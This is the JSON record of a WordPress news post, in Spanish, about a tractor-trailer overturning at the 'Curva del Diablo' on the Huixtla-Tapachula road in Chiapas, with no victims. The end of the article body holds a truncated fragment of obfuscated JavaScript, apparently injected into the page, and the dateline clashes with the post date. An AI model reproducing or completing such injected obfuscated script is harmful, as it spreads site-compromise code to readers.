{"id":9472,"date":"2023-04-10T23:03:03","date_gmt":"2023-04-10T23:03:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9472"},"modified":"2023-04-10T23:03:04","modified_gmt":"2023-04-10T23:03:04","slug":"vuelca-camion-en-la-curva-del-diablo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9472","title":{"rendered":"Vuelca cami\u00f3n en la &#8220;Curva del Diablo&#8221;"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230410-WA0040-1024x768.jpg\" alt=\"\" class=\"wp-image-9473\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230410-WA0040-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230410-WA0040-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230410-WA0040-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230410-WA0040-1536x1153.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230410-WA0040.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 10 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Este lunes por la ma\u00f1ana se registr\u00f3 la Volcadura de un cami\u00f3n en el tramo Huixtla-Tapachula, a la altura del punto conocido como la &#8220;Curva del Diablo&#8221;.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, cerca de las 10 de la ma\u00f1ana automovilistas reportaron este hecho.<\/p>\n\n\n\n<p>Las autoridades localizaron en este punto un tractocami\u00f3n de color blanco con rojo con placas 12 AV3E del Servicio P\u00fablico Federal con remolque de caja volcado.<\/p>\n\n\n\n<p>En el lugar se inform\u00f3 que, la unidad ve\u00eda procedente de Puebla con destino hacia Suchiate cargado con arena s\u00edlica.<\/p>\n\n\n\n<p>Elementos de la Guardia Nacional divisi\u00f3n de caminos se hizo cargo de la unidad.<\/p>\n\n\n\n<p>Afortunadamente no hubo v\u00edctimas que lamentar, pero s\u00ed da\u00f1os materiales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 10 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Este lunes por la ma\u00f1ana se registr\u00f3 la Volcadura de un cami\u00f3n en el tramo Huixtla-Tapachula, a la altura del punto conocido como la &#8220;Curva del Diablo&#8221;. Los reportes oficiales informaron que, cerca de las 10 de la ma\u00f1ana automovilistas reportaron este hecho. Las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9473,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9472","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9472","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9472"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9472\/revisions"}],"predecessor-version":[{"id":9474,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9472\/revisions\/9474"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9473"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9472"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9472"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9472"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}